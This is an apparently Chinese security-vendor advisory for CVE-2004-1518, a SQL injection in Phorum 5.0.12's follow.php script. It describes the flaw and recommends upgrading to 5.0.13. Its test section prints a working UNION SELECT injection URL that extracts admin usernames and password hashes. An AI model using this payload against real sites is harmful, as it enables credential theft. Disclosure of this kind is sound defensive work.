安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Phorum follow.php脚本远程SQL注入漏洞
发布日期:
2004-11-11
更新日期:
2004-11-12
受影响系统:
Phorum Phorum 5.0.12
不受影响系统:
Phorum Phorum 5.0.13
描述:
BUGTRAQ ID:
11660
CVE(CAN) ID:
CVE-2004-1518
Phorum是一款基于PHP的WEB论坛程序。
Phorum包含的'follow.php'脚本不正确过滤用户提交的URL数据,远程攻击者可以利用这个漏洞进行SQL注入攻击。
'follow.php'对"$thread" 参数缺少充分过滤,攻击者提交包含恶意SQL命令的数据作为此参数数据,可更改原来的SQL逻辑,获得敏感信息,如管理员的密码HASH数据。
<*来源:Janek Vind "waraxe" (
come2waraxe@yahoo.com
)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=110021385926870&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Janek Vind "waraxe" (
come2waraxe@yahoo.com
)提供了如下测试方法:
http://localhost/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELEC
\
T%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1% \
2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
建议:
厂商补丁:
Phorum
------
Phorum version 5.0.13不存在此漏洞,建议用户下载使用:
http://phorum.org/downloads.php
浏览次数:
3586
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客